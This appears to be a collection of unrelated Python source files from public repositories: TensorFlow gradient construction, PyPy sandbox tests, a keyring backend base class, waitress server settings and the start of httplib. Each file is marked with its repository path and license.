Raises:
ValueError: If one of the grad_ys is invalid.
"""
if len(grad_ys) != len(ys):
raise ValueError("Passed %d grad_ys for %d ys" % (len(grad_ys), len(ys)))
grad_ys = ops.convert_n_to_tensor_or_indexed_slices(grad_ys, name="grad_y")
for i in xrange(len(grad_ys)):
grad_y = grad_ys[i]
y = ys[i]
if grad_y is None:
with ops.device(_GetGradsDevice(y.op, colocate_gradients_with_ops)):
grad_ys[i] = array_ops.fill(
array_ops.shape(y),
constant_op.constant(1,
dtype=y.dtype))
else:
if grad_y.dtype != y.dtype:
raise ValueError("Y and ys_grad must be of the same type, "
"not y: %s, ys_grad: %s " %
(dtypes.as_dtype(y.dtype).name,
dtypes.as_dtype(grad_y.dtype).name))
return grad_ys
def _VerifyGeneratedGradients(grads, op):
"""Verify that gradients are valid in number and type.
Args:
grads: List of generated gradients.
op: Operation for which the gradients where generated.
Raises:
ValueError: if the gradients are invalid.
"""
if len(grads) != len(op.inputs):
raise ValueError("Num gradients %d generated for op %s do not match num "
"inputs %d" % (len(grads), op.node_def, len(op.inputs)))
for i in xrange(len(grads)):
grad = grads[i]
inp = op.inputs[i]
if grad is not None:
if not grad.dtype.is_compatible_with(inp.dtype):
raise ValueError("Gradient type %s generated for op %s does "
"not match input type %s" %
(dtypes.as_dtype(grad.dtype).name, op.node_def,
dtypes.as_dtype(inp.dtype).name))
def _StopOps(from_ops, pending_count):
"""The set of ops that terminate the gradient computation.
This computes the frontier of the forward graph *before* which backprop
should stop. Operations in the returned set will not be differentiated.
This set is defined as the subset of `from_ops` containing ops that have
no predecessor in `from_ops`. `pending_count` is the result of
`_PendingCount(g, xs, from_ops)`. An 'op' has predecessors in `from_ops`
iff pending_count[op._id] > 0.
Args:
from_ops: list of Operations.
pending_count: List of integers, indexed by operation id.
Returns:
The set of operations.
"""
stop_ops = set()
for op in from_ops:
is_stop_op = True
for inp in op.inputs:
if pending_count[inp.op._id] > 0:
is_stop_op = False
break
if is_stop_op:
stop_ops.add(op._id)
return stop_ops
def gradients(ys,
xs,
grad_ys=None,
name="gradients",
colocate_gradients_with_ops=False,
gate_gradients=False,
aggregation_method=None):
"""Constructs symbolic partial derivatives of `ys` w.r.t. x in `xs`.
`ys` and `xs` are each a `Tensor` or a list of tensors. `grad_ys`
is a list of `Tensor`, holding the gradients received by the
`ys`. The list must be the same length as `ys`.
`gradients()` adds ops to the graph to output the partial
derivatives of `ys` with respect to `xs`. It returns a list of
`Tensor` of length `len(xs)` where each tensor is the `sum(dy/dx)`
for y in `ys`.
`grad_ys` is a list of tensors of the same length as `ys` that holds
the initial gradients for each y in `ys`. When `grad_ys` is None,
we fill in a tensor of '1's of the shape of y for each y in `ys`. A
user can provide their own initial `grad_ys` to compute the
derivatives using a different initial gradient for each y (e.g., if
one wanted to weight the gradient differently for each value in
each y).
Args:
ys: A `Tensor` or list of tensors to be differentiated.
xs: A `Tensor` or list of tensors to be used for differentiation.
grad_ys: Optional. A `Tensor` or list of tensors the same size as
`ys` and holding the gradients computed for each y in `ys`.
name: Optional name to use for grouping all the gradient ops together.
defaults to 'gradients'.
colocate_gradients_with_ops: If True, try colocating gradients with
the corresponding op.
gate_gradients: If True, add a tuple around the gradients returned
for an operations. This avoids some race conditions.
aggregation_method: Specifies the method used to combine gradient terms.
Accepted values are constants defined in the class `AggregationMethod`.
Returns:
A list of `sum(dy/dx)` for each x in `xs`.
Raises:
LookupError: if one of the operations between `x` and `y` does not
have a registered gradient function.
ValueError: if the arguments are invalid.
"""
ys = _AsList(ys)
xs = _AsList(xs)
if grad_ys is None:
grad_ys = [None] * len(ys)
else:
grad_ys = _AsList(grad_ys)
with ops.op_scope(ys + xs + grad_ys, name, "gradients"):
ys = ops.convert_n_to_tensor_or_indexed_slices(ys, name="y")
xs = ops.convert_n_to_tensor_or_indexed_slices(xs, name="x")
grad_ys = _DefaultGradYs(grad_ys, ys, colocate_gradients_with_ops)
# The approach we take here is as follows: Create a list of all ops in the
# subgraph between the ys and xs. Visit these ops in reverse order of ids
# to ensure that when we visit an op the gradients w.r.t its outputs have
# been collected. Then aggregate these gradients if needed, call the op's
# gradient function, and add the generated gradients to the gradients for
# its input.
# Initialize the pending count for ops in the connected subgraph from ys
# to the xs.
to_ops = [t.op for t in ys]
from_ops = [t.op for t in xs]
pending_count, has_control_flow = _PendingCount(ops.get_default_graph(),
to_ops, from_ops)
# Iterate over the collected ops.
#
# grads: op => list of gradients received on each output endpoint of the
# op. The gradients for each endpoint are initially collected as a list.
# When it is time to call the op's gradient function, for each endpoint we
# aggregate the list of received gradients into a Add() Operation if there
# is more than one.
grads = {}
# Add the initial gradients for the ys.
for y, grad_y in zip(ys, grad_ys):
_SetGrad(grads, y, grad_y)
# Initialize queue with to_ops.
queue = collections.deque()
# Add the ops in 'to_ops' into the queue.
to_ops_set = set()
for op in to_ops:
if op._id not in to_ops_set:
to_ops_set.add(op._id)
queue.append(op)
# The set of 'from_ops'.
stop_ops = _StopOps(from_ops, pending_count)
while queue:
# generate gradient subgraph for op.
op = queue.popleft()
with ops.device(_GetGradsDevice(op, colocate_gradients_with_ops)):
if has_control_flow:
control_flow_ops.EnterGradWhileContext(op)
out_grads = _AggregatedGrads(grads, op, has_control_flow,
aggregation_method)
grad_fn = None
if any(out_grads) and op._id not in stop_ops:
# A grad_fn must be defined, either as a function or as None
# for ops that do not have gradients.
try:
grad_fn = ops.get_gradient_function(op)
except LookupError:
raise LookupError(
"No gradient defined for operation '%s' (op type: %s)" %
(op.name, op.type))
if grad_fn and any(out_grads):
# NOTE: If _AggregatedGrads didn't compute a value for the i'th
# output, it means that the cost does not depend on output[i],
# therefore dC/doutput[i] is 0.
for i, out_grad in enumerate(out_grads):
if (not out_grad and
dtypes.as_dtype(op.outputs[i].dtype).base_dtype in
(dtypes.float32, dtypes.float64)):
# Only floating-point outputs get a zero gradient. Gradient
# functions should ignore the gradient for other outputs.
out_grads[i] = array_ops.zeros_like(op.outputs[i])
with ops.name_scope(op.name + "_grad"):
# pylint: disable=protected-access
with ops.get_default_graph()._original_op(op):
# pylint: enable=protected-access
op_wrapper = op
if has_control_flow:
op_wrapper = control_flow_ops.MakeWrapper(op)
in_grads = _AsList(grad_fn(op_wrapper, *out_grads))
_VerifyGeneratedGradients(in_grads, op)
if gate_gradients and len(in_grads) > 1:
in_grads = control_flow_ops.tuple(in_grads)
logging.vlog(1, "Gradient for '" + op.name + "'")
logging.vlog(1, " in --> %s",
", ".join([x.name for x in out_grads if x]))
logging.vlog(1, " out --> %s",
", ".join([x.name for x in in_grads if x]))
else:
# If no grad_fn is defined or none of out_grads is available,
# just propagates a list of None backwards.
in_grads = [None] * len(op.inputs)
for t_in, in_grad in zip(op.inputs, in_grads):
if in_grad:
_SetGrad(grads, t_in, in_grad)
if has_control_flow:
control_flow_ops.ExitGradWhileContext(op)
# update pending count for the inputs of op.
for x in op.inputs:
pending_count[x.op._id] -= 1
ready = (pending_count[x.op._id] == 0)
if has_control_flow and not ready:
ready = (pending_count[x.op._id] > 0 and
control_flow_ops.IsLoopSwitch(x.op))
if ready:
queue.append(x.op)
for x in op.control_inputs:
pending_count[x._id] -= 1
if pending_count[x._id] is 0:
queue.append(x)
return [_GetGrad(grads, x) for x in xs]
def _SetGrad(grads, t, grad):
"""Sets gradient "grad" in "grads" for tensor "t"."""
op = t.op
op_grads = grads.get(op)
if not op_grads:
op_grads = [[] for _ in xrange(len(op.outputs))]
grads[op] = op_grads
t_grads = op_grads[t.value_index]
if isinstance(t_grads, list):
t_grads.append(grad)
else:
assert op.type == "Switch"
op_grads[t.value_index] = grad
def _GetGrad(grads, t):
"""Gets gradient for tensor "t"."""
op = t.op
op_grads = grads.get(op)
if not op_grads:
return None
t_grad = op_grads[t.value_index]
assert not isinstance(t_grad, list), (
"gradients list should have been aggregated by now.")
return t_grad
def _GetGrads(grads, op):
"""Gets all gradients for op."""
if op in grads:
return grads[op]
else:
return [[] for _ in xrange(len(op.outputs))]
def _HandleNestedIndexedSlices(grad):
assert isinstance(grad, ops.IndexedSlices)
if isinstance(grad.values, ops.Tensor):
return grad
else:
assert isinstance(grad.values, ops.IndexedSlices)
g = _HandleNestedIndexedSlices(grad.values)
return ops.IndexedSlices(
g.values, array_ops.gather(grad.indices, g.indices), g.dense_shape)
def _AccumulatorShape(inputs):
shape = tensor_shape.unknown_shape()
for i in inputs:
if isinstance(i, ops.Tensor):
shape = shape.merge_with(i.get_shape())
return shape
class AggregationMethod(object):
"""A class listing aggregation methods used to combine gradients.
Computing partial derivatives can require aggregating gradient
contributions. This class lists the various methods that can
be used to combine gradients in the graph:
* `ADD_N`: All of the gradient terms are summed as part of one
operation using the "AddN" op. It has the property that all
gradients must be ready before any aggregation is performed.
* `DEFAULT`: The system-chosen default aggregation method.
"""
ADD_N = 0
DEFAULT = ADD_N
# The following are experimental and may not be supported in future releases.
EXPERIMENTAL_TREE = 1
EXPERIMENTAL_ACCUMULATE_N = 2
def _AggregatedGrads(grads, op, has_control_flow, aggregation_method=None):
"""Get the aggregated gradients for op.
Args:
grads: The map of memoized gradients.
op: The op to get gradients for.
has_control_flow: True iff the graph contains control flow ops.
aggregation_method: Specifies the method used to combine gradient terms.
Accepted values are constants defined in the class `AggregationMethod`.
Returns:
A list of gradients, one per each output of `op`. If the gradients
for a particular output is a list, this function aggregates it
before returning.
Raises:
TypeError: if the incoming grads are not Tensors or IndexedSlices.
ValueError: if the arguments are invalid.
"""
if aggregation_method is None:
aggregation_method = AggregationMethod.DEFAULT
if aggregation_method not in [AggregationMethod.ADD_N,
AggregationMethod.EXPERIMENTAL_TREE,
AggregationMethod.EXPERIMENTAL_ACCUMULATE_N]:
raise ValueError("Invalid aggregation_method specified.")
out_grads = _GetGrads(grads, op)
for i, out_grad in enumerate(out_grads):
if has_control_flow:
if isinstance(out_grad, (ops.Tensor, ops.IndexedSlices)):
assert op.type == "Switch"
continue
# Grads have to be Tensors or IndexedSlices
if not all([isinstance(g, (ops.Tensor, ops.IndexedSlices))
for g in out_grad if g]):
raise TypeError("gradients have to be either all Tensors "
"or all IndexedSlices")
# Aggregate multiple gradients, and convert [] to None.
if out_grad:
if all([isinstance(g, ops.Tensor) for g in out_grad if g]):
tensor_shape = _AccumulatorShape(out_grad)
if len(out_grad) < 2:
used = "nop"
out_grads[i] = out_grad[0]
elif (aggregation_method == AggregationMethod.EXPERIMENTAL_ACCUMULATE_N
and len(out_grad) > 2 and tensor_shape.is_fully_defined()):
# The benefit of using AccumulateN is that its inputs can be combined
# in any order and this can allow the expression to be evaluated with
# a smaller memory footprint. When used with gpu_allocator_retry,
# it is possible to compute a sum of terms which are much larger than
# total GPU memory.
# AccumulateN can currently only be used if we know the shape for
# an accumulator variable. If this is not known, or if we only have
# 2 grads then we fall through to the "tree" case below.
used = "accumulate_n"
out_grads[i] = math_ops.accumulate_n(out_grad)
elif aggregation_method in [AggregationMethod.EXPERIMENTAL_TREE,
AggregationMethod.EXPERIMENTAL_ACCUMULATE_N
]:
# Aggregate all gradients by doing pairwise sums: this may
# reduce performance, but it can improve memory because the
# gradients can be released earlier.
#
# TODO(vrv): Consider replacing this with a version of
# tf.AddN() that eagerly frees its inputs as soon as they are
# ready, so the order of this tree does not become a problem.
used = "tree"
with ops.name_scope(op.name + "_gradient_sum"):
running_sum = out_grad[0]
for grad in out_grad[1:]:
running_sum = math_ops.add_n([running_sum, grad])
out_grads[i] = running_sum
else:
used = "add_n"
out_grads[i] = math_ops.add_n(out_grad)
logging.vlog(2, " _AggregatedGrads %d x %s using %s", len(out_grad),
tensor_shape, used)
else:
out_grad = math_ops._as_indexed_slices_list([g for g in out_grad if g])
out_grad = [_HandleNestedIndexedSlices(x) for x in out_grad]
# Form IndexedSlices out of the concatenated values and
# indices.
out_grads[i] = ops.IndexedSlices(
array_ops.concat(0, [x.values for x in out_grad]),
array_ops.concat(0, [x.indices
for x in out_grad]), out_grad[0].dense_shape)
else:
out_grads[i] = []
return out_grads
# TODO(vrv): Make this available when we want to make it public.
def _hessian_vector_product(ys, xs, v):
"""Multiply the Hessian of `ys` wrt `xs` by `v`.
This is an efficient construction that uses a backprop-like approach
to compute the product between the Hessian and another vector. The
Hessian is usually too large to be explicitly computed or even
represented, but this method allows us to at least multiply by it
for the same big-O cost as backprop.
Implicit Hessian-vector products are the main practical, scalable way
of using second derivatives with neural networks. They allow us to
do things like construct Krylov subspaces and approximate conjugate
gradient descent.
Example: if `y` = 1/2 `x`^T A `x`, then `hessian_vector_product(y,
x, v)` will return an expression that evaluates to the same values
as (A + A.T) `v`.
Args:
ys: A scalar value, or a tensor or list of tensors to be summed to
yield a scalar.
xs: A list of tensors that we should construct the Hessian over.
v: A list of tensors, with the same shapes as xs, that we want to
multiply by the Hessian.
Returns:
A list of tensors (or if the list would be length 1, a single tensor)
containing the product between the Hessian and `v`.
Raises:
ValueError: `xs` and `v` have different length.
"""
# Validate the input
length = len(xs)
if len(v) != length:
raise ValueError("xs and v must have the same length.")
# First backprop
grads = gradients(ys, xs)
assert len(grads) == length
elemwise_products = [math_ops.mul(grad_elem, array_ops.stop_gradient(v_elem))
for grad_elem, v_elem in zip(grads, v)
if grad_elem is not None]
# Second backprop
return gradients(elemwise_products, xs)
| apache-2.0 |
oblique-labs/pyVM | rpython/translator/sandbox/test/test_sandlib.py | 1 | 8723 | import py
import errno, os, StringIO
from rpython.tool.sourcetools import func_with_new_name
from rpython.rtyper.lltypesystem import rffi
from rpython.translator.sandbox.sandlib import SandboxedProc
from rpython.translator.sandbox.sandlib import SimpleIOSandboxedProc
from rpython.translator.sandbox.sandlib import VirtualizedSandboxedProc
from rpython.translator.sandbox.sandlib import VirtualizedSocketProc
from rpython.translator.sandbox.test.test_sandbox import compile
from rpython.translator.sandbox.vfs import Dir, File, RealDir, RealFile
class MockSandboxedProc(SandboxedProc):
"""A sandbox process wrapper that replays expected syscalls."""
def __init__(self, args, expected):
SandboxedProc.__init__(self, args)
self.expected = expected
self.seen = 0
def _make_method(name):
def do_xxx(self, *input):
print "decoded from subprocess: %s%r" % (name, input)
expectedmsg, expectedinput, output = self.expected[self.seen]
assert name == expectedmsg
assert input == expectedinput
self.seen += 1
if isinstance(output, Exception):
raise output
return output
return func_with_new_name(do_xxx, 'do_%s' % name)
do_ll_os__ll_os_open = _make_method("open")
do_ll_os__ll_os_read = _make_method("read")
do_ll_os__ll_os_write = _make_method("write")
do_ll_os__ll_os_close = _make_method("close")
def test_lib():
def entry_point(argv):
fd = os.open("/tmp/foobar", os.O_RDONLY, 0777)
assert fd == 77
res = os.read(fd, 123)
assert res == "he\x00llo"
count = os.write(fd, "world\x00!\x00")
assert count == 42
for arg in argv:
count = os.write(fd, arg)
assert count == 61
os.close(fd)
return 0
exe = compile(entry_point)
proc = MockSandboxedProc([exe, 'x1', 'y2'], expected = [
("open", ("/tmp/foobar", os.O_RDONLY, 0777), 77),
("read", (77, 123), "he\x00llo"),
("write", (77, "world\x00!\x00"), 42),
("write", (77, exe), 61),
("write", (77, "x1"), 61),
("write", (77, "y2"), 61),
("close", (77,), None),
])
proc.handle_forever()
assert proc.seen == len(proc.expected)
def test_foobar():
py.test.skip("to be updated")
foobar = rffi.llexternal("foobar", [rffi.CCHARP], rffi.LONG)
def entry_point(argv):
s = rffi.str2charp(argv[1]); n = foobar(s); rffi.free_charp(s)
s = rffi.str2charp(argv[n]); n = foobar(s); rffi.free_charp(s)
return n
exe = compile(entry_point)
proc = MockSandboxedProc([exe, 'spam', 'egg'], expected = [
("foobar", ("spam",), 2),
("foobar", ("egg",), 0),
])
proc.handle_forever()
assert proc.seen == len(proc.expected)
def test_simpleio():
def entry_point(argv):
print "Please enter a number:"
buf = ""
while True:
t = os.read(0, 1) # 1 character from stdin
if not t:
raise EOFError
if t == '\n':
break
buf += t
num = int(buf)
print "The double is:", num * 2
return 0
exe = compile(entry_point)
proc = SimpleIOSandboxedProc([exe, 'x1', 'y2'])
output, error = proc.communicate("21\n")
assert output == "Please enter a number:\nThe double is: 42\n"
assert error == ""
def test_socketio():
class SocketProc(VirtualizedSocketProc, SimpleIOSandboxedProc):
def build_virtual_root(self):
pass
def entry_point(argv):
fd = os.open("tcp://python.org:80", os.O_RDONLY, 0777)
os.write(fd, 'GET /\n')
print os.read(fd, 50)
return 0
exe = compile(entry_point)
proc = SocketProc([exe])
output, error = proc.communicate("")
assert output.startswith('HTTP/1.1 301 Moved Permanently')
def test_oserror():
def entry_point(argv):
try:
os.open("/tmp/foobar", os.O_RDONLY, 0777)
except OSError as e:
os.close(e.errno) # nonsense, just to see outside
return 0
exe = compile(entry_point)
proc = MockSandboxedProc([exe], expected = [
("open", ("/tmp/foobar", os.O_RDONLY, 0777), OSError(-42, "baz")),
("close", (-42,), None),
])
proc.handle_forever()
assert proc.seen == len(proc.expected)
class SandboxedProcWithFiles(VirtualizedSandboxedProc, SimpleIOSandboxedProc):
"""A sandboxed process with a simple virtualized filesystem.
For testing file operations.
"""
def build_virtual_root(self):
return Dir({
'hi.txt': File("Hello, world!\n"),
'this.pyc': RealFile(__file__),
})
def test_too_many_opens():
def entry_point(argv):
try:
open_files = []
for i in range(500):
fd = os.open('/hi.txt', os.O_RDONLY, 0777)
open_files.append(fd)
txt = os.read(fd, 100)
if txt != "Hello, world!\n":
print "Wrong content: %s" % txt
except OSError as e:
# We expect to get EMFILE, for opening too many files.
if e.errno != errno.EMFILE:
print "OSError: %s!" % (e.errno,)
else:
print "We opened 500 fake files! Shouldn't have been able to."
for fd in open_files:
os.close(fd)
try:
open_files = []
for i in range(500):
fd = os.open('/this.pyc', os.O_RDONLY, 0777)
open_files.append(fd)
except OSError as e:
# We expect to get EMFILE, for opening too many files.
if e.errno != errno.EMFILE:
print "OSError: %s!" % (e.errno,)
else:
print "We opened 500 real files! Shouldn't have been able to."
print "All ok!"
return 0
exe = compile(entry_point)
proc = SandboxedProcWithFiles([exe])
output, error = proc.communicate("")
assert output == "All ok!\n"
assert error == ""
def test_fstat():
def compare(a, b, i):
if a != b:
print "stat and fstat differ @%d: %s != %s" % (i, a, b)
def entry_point(argv):
try:
# Open a file, and compare stat and fstat
fd = os.open('/hi.txt', os.O_RDONLY, 0777)
st = os.stat('/hi.txt')
fs = os.fstat(fd)
# RPython requires the index for stat to be a constant.. :(
compare(st[0], fs[0], 0)
compare(st[1], fs[1], 1)
compare(st[2], fs[2], 2)
compare(st[3], fs[3], 3)
compare(st[4], fs[4], 4)
compare(st[5], fs[5], 5)
compare(st[6], fs[6], 6)
compare(st[7], fs[7], 7)
compare(st[8], fs[8], 8)
compare(st[9], fs[9], 9)
except OSError as e:
print "OSError: %s" % (e.errno,)
print "All ok!"
return 0
exe = compile(entry_point)
proc = SandboxedProcWithFiles([exe])
output, error = proc.communicate("")
assert output == "All ok!\n"
assert error == ""
def test_lseek():
def char_should_be(c, should):
if c != should:
print "Wrong char: '%s' should be '%s'" % (c, should)
def entry_point(argv):
fd = os.open('/hi.txt', os.O_RDONLY, 0777)
char_should_be(os.read(fd, 1), "H")
new = os.lseek(fd, 3, os.SEEK_CUR)
if new != 4:
print "Wrong offset, %d should be 4" % new
char_should_be(os.read(fd, 1), "o")
new = os.lseek(fd, -3, os.SEEK_END)
if new != 11:
print "Wrong offset, %d should be 11" % new
char_should_be(os.read(fd, 1), "d")
new = os.lseek(fd, 7, os.SEEK_SET)
if new != 7:
print "Wrong offset, %d should be 7" % new
char_should_be(os.read(fd, 1), "w")
print "All ok!"
return 0
exe = compile(entry_point)
proc = SandboxedProcWithFiles([exe])
output, error = proc.communicate("")
assert output == "All ok!\n"
assert error == ""
def test_getuid():
if not hasattr(os, 'getuid'):
py.test.skip("posix only")
def entry_point(argv):
import os
print "uid is %s" % os.getuid()
print "euid is %s" % os.geteuid()
print "gid is %s" % os.getgid()
print "egid is %s" % os.getegid()
return 0
exe = compile(entry_point)
proc = SandboxedProcWithFiles([exe])
output, error = proc.communicate("")
assert output == "uid is 1000\neuid is 1000\ngid is 1000\negid is 1000\n"
assert error == ""
| mit |
robinson96/GRAPE | keyring/keyring/backend.py | 1 | 3766 | """
Keyring implementation support
"""
from __future__ import absolute_import
import abc
import itertools
from keyring.keyring import errors
from keyring.keyring.util import properties
from keyring.keyring import util
class KeyringBackendMeta(abc.ABCMeta):
"""
A metaclass that's both an ABCMeta and a type that keeps a registry of
all (non-abstract) types.
"""
def __init__(cls, name, bases, dict):
super(KeyringBackendMeta, cls).__init__(name, bases, dict)
if not hasattr(cls, '_classes'):
cls._classes = set()
classes = cls._classes
if not cls.__abstractmethods__:
classes.add(cls)
class KeyringBackend(object):
"""The abstract base class of the keyring, every backend must implement
this interface.
"""
__metaclass__ = KeyringBackendMeta
#@abc.abstractproperty
def priority(cls):
"""
Each backend class must supply a priority, a number (float or integer)
indicating the priority of the backend relative to all other backends.
The priority need not be static -- it may (and should) vary based
attributes of the environment in which is runs (platform, available
packages, etc.).
A higher number indicates a higher priority. The priority should raise
a RuntimeError with a message indicating the underlying cause if the
backend is not suitable for the current environment.
As a rule of thumb, a priority between zero but less than one is
suitable, but a priority of one or greater is recommended.
"""
@properties.ClassProperty
@classmethod
def viable(cls):
with errors.ExceptionRaisedContext() as exc:
cls.priority
return not bool(exc)
@abc.abstractmethod
def get_password(self, service, username):
"""Get password of the username for the service
"""
return None
@abc.abstractmethod
def set_password(self, service, username, password):
"""Set password for the username of the service
"""
raise errors.PasswordSetError("reason")
# for backward-compatibility, don't require a backend to implement
# delete_password
#@abc.abstractmethod
def delete_password(self, service, username):
"""Delete the password for the username of the service.
"""
raise errors.PasswordDeleteError("reason")
class Crypter(object):
"""Base class providing encryption and decryption
"""
@abc.abstractmethod
def encrypt(self, value):
"""Encrypt the value.
"""
pass
@abc.abstractmethod
def decrypt(self, value):
"""Decrypt the value.
"""
pass
class NullCrypter(Crypter):
"""A crypter that does nothing
"""
def encrypt(self, value):
return value
def decrypt(self, value):
return value
@util.once
def get_all_keyring():
"""
Return a list of all implemented keyrings that can be constructed without
parameters.
"""
# ensure that all keyring backends are loaded
for mod_name in ('file', 'Gnome', 'Google', 'keyczar', 'kwallet', 'multi',
'OS_X', 'pyfs', 'SecretService', 'Windows'):
# use fromlist to cause the module to resolve under Demand Import
__import__('keyring.keyring.backends.'+mod_name, fromlist=('__name__',))
def is_class_viable(keyring_cls):
try:
keyring_cls.priority
except RuntimeError:
return False
return True
all_classes = KeyringBackend._classes
viable_classes = itertools.ifilter(is_class_viable, all_classes)
return list(util.suppress_exceptions(viable_classes,
exceptions=TypeError))
| bsd-3-clause |
SamuelDSR/YouCompleteMe-Win7-GVIM | third_party/waitress/waitress/adjustments.py | 3 | 7142 | ##############################################################################
#
# Copyright (c) 2002 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Adjustments are tunable parameters.
"""
import getopt
import socket
import sys
truthy = frozenset(('t', 'true', 'y', 'yes', 'on', '1'))
def asbool(s):
""" Return the boolean value ``True`` if the case-lowered value of string
input ``s`` is any of ``t``, ``true``, ``y``, ``on``, or ``1``, otherwise
return the boolean value ``False``. If ``s`` is the value ``None``,
return ``False``. If ``s`` is already one of the boolean values ``True``
or ``False``, return it."""
if s is None:
return False
if isinstance(s, bool):
return s
s = str(s).strip()
return s.lower() in truthy
def asoctal(s):
"""Convert the given octal string to an actual number."""
return int(s, 8)
def slash_suffix_stripped_str(s):
return s.rstrip('/')
class Adjustments(object):
"""This class contains tunable parameters.
"""
_params = (
('host', str),
('port', int),
('threads', int),
('url_scheme', str),
('url_prefix', slash_suffix_stripped_str),
('backlog', int),
('recv_bytes', int),
('send_bytes', int),
('outbuf_overflow', int),
('inbuf_overflow', int),
('connection_limit', int),
('cleanup_interval', int),
('channel_timeout', int),
('log_socket_errors', asbool),
('max_request_header_size', int),
('max_request_body_size', int),
('expose_tracebacks', asbool),
('ident', str),
('asyncore_loop_timeout', int),
('asyncore_use_poll', asbool),
('unix_socket', str),
('unix_socket_perms', asoctal),
)
_param_map = dict(_params)
# hostname or IP address to listen on
host = '0.0.0.0'
# TCP port to listen on
port = 8080
# mumber of threads available for tasks
threads = 4
# default ``wsgi.url_scheme`` value
url_scheme = 'http'
# default ``SCRIPT_NAME`` value, also helps reset ``PATH_INFO``
# when nonempty
url_prefix = ''
# server identity (sent in Server: header)
ident = 'waitress'
# backlog is the value waitress passes to pass to socket.listen() This is
# the maximum number of incoming TCP connections that will wait in an OS
# queue for an available channel. From listen(1): "If a connection
# request arrives when the queue is full, the client may receive an error
# with an indication of ECONNREFUSED or, if the underlying protocol
# supports retransmission, the request may be ignored so that a later
# reattempt at connection succeeds."
backlog = 1024
# recv_bytes is the argument to pass to socket.recv().
recv_bytes = 8192
# send_bytes is the number of bytes to send to socket.send(). Multiples
# of 9000 should avoid partly-filled packets, but don't set this larger
# than the TCP write buffer size. In Linux, /proc/sys/net/ipv4/tcp_wmem
# controls the minimum, default, and maximum sizes of TCP write buffers.
send_bytes = 18000
# A tempfile should be created if the pending output is larger than
# outbuf_overflow, which is measured in bytes. The default is 1MB. This
# is conservative.
outbuf_overflow = 1048576
# A tempfile should be created if the pending input is larger than
# inbuf_overflow, which is measured in bytes. The default is 512K. This
# is conservative.
inbuf_overflow = 524288
# Stop creating new channels if too many are already active (integer).
# Each channel consumes at least one file descriptor, and, depending on
# the input and output body sizes, potentially up to three. The default
# is conservative, but you may need to increase the number of file
# descriptors available to the Waitress process on most platforms in
# order to safely change it (see ``ulimit -a`` "open files" setting).
# Note that this doesn't control the maximum number of TCP connections
# that can be waiting for processing; the ``backlog`` argument controls
# that.
connection_limit = 100
# Minimum seconds between cleaning up inactive channels.
cleanup_interval = 30
# Maximum seconds to leave an inactive connection open.
channel_timeout = 120
# Boolean: turn off to not log premature client disconnects.
log_socket_errors = True
# maximum number of bytes of all request headers combined (256K default)
max_request_header_size = 262144
# maximum number of bytes in request body (1GB default)
max_request_body_size = 1073741824
# expose tracebacks of uncaught exceptions
expose_tracebacks = False
# Path to a Unix domain socket to use.
unix_socket = None
# Path to a Unix domain socket to use.
unix_socket_perms = 0o600
# The socket options to set on receiving a connection. It is a list of
# (level, optname, value) tuples. TCP_NODELAY disables the Nagle
# algorithm for writes (Waitress already buffers its writes).
socket_options = [
(socket.SOL_TCP, socket.TCP_NODELAY, 1),
]
# The asyncore.loop timeout value
asyncore_loop_timeout = 1
# The asyncore.loop flag to use poll() instead of the default select().
asyncore_use_poll = False
def __init__(self, **kw):
for k, v in kw.items():
if k not in self._param_map:
raise ValueError('Unknown adjustment %r' % k)
setattr(self, k, self._param_map[k](v))
if (sys.platform[:3] == "win" and
self.host == 'localhost'): # pragma: no cover
self.host = ''
@classmethod
def parse_args(cls, argv):
"""Parse command line arguments.
"""
long_opts = ['help', 'call']
for opt, cast in cls._params:
opt = opt.replace('_', '-')
if cast is asbool:
long_opts.append(opt)
long_opts.append('no-' + opt)
else:
long_opts.append(opt + '=')
kw = {
'help': False,
'call': False,
}
opts, args = getopt.getopt(argv, '', long_opts)
for opt, value in opts:
param = opt.lstrip('-').replace('-', '_')
if param.startswith('no_'):
param = param[3:]
kw[param] = False
elif param in ('help', 'call') or cls._param_map[param] is asbool:
kw[param] = True
else:
kw[param] = cls._param_map[param](value)
return kw, args
| gpl-3.0 |
eBay/restcommander | play-1.2.4/python/Lib/httplib.py | 7 | 43590 | """HTTP/1.1 client library
<intro stuff goes here>
<other stuff, too>
HTTPConnection goes through a number of "states", which define when a client
may legally make another request or fetch the response for a particular
request. This diagram details these state transitions:
(null)
|
| HTTPConnection()
v
Idle
|
| putrequest()
v
Request-started
|
| ( putheader() )* endheaders()
v
Request-sent
|
| response = getresponse()
v
Unread-response [Response-headers-read]
|\____________________
| |
| response.read() | putrequest()
v v
Idle Req-started-unread-response
______/|
/ |
response.read() | | ( putheader() )* endheaders()
v v
Request-started Req-sent-unread-response
|
| response.read()
v
Request-sent
This diagram presents the following rules:
-- a second request may not be started until {response-headers-read}
-- a response [object] cannot be retrieved until {request-sent}
-- there is no differentiation between an unread response body and a
partially read response body
Note: this enforcement is applied by the HTTPConnection class. The
HTTPResponse class does not enforce this state machine, which
implies sophisticated clients may accelerate the request/response
pipeline. Caution should be taken, though: accelerating the states
beyond the above pattern may imply knowledge of the server's
connection-close behavior for certain requests. For example, it
is impossible to tell whether the server will close the connection
UNTIL the response headers have been read; this means that further
requests cannot be placed into the pipeline until it is known that
the server will NOT be closing the connection.
Logical State __state __response
------------- ------- ----------
Idle _CS_IDLE None
Request-started _CS_REQ_STARTED None
Request-sent _CS_REQ_SENT None
Unread-response _CS_IDLE <response_class>
Req-started-unread-response _CS_REQ_STARTED <response_class>
Req-sent-unread-response _CS_REQ_SENT <response_class>
"""
import socket
from sys import py3kwarning
from urlparse import urlsplit
import warnings
with warnings.catch_warnings():
if py3kwarning:
warnings.filterwarnings("ignore", ".*mimetools has been removed",
DeprecationWarning)
import mimetools
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
__all__ = ["HTTP", "HTTPResponse", "HTTPConnection",
"HTTPException", "NotConnected", "UnknownProtocol",
"UnknownTransferEncoding", "UnimplementedFileMode",
"IncompleteRead", "InvalidURL", "ImproperConnectionState",
"CannotSendRequest", "CannotSendHeader", "ResponseNotReady",
"BadStatusLine", "error", "responses"]
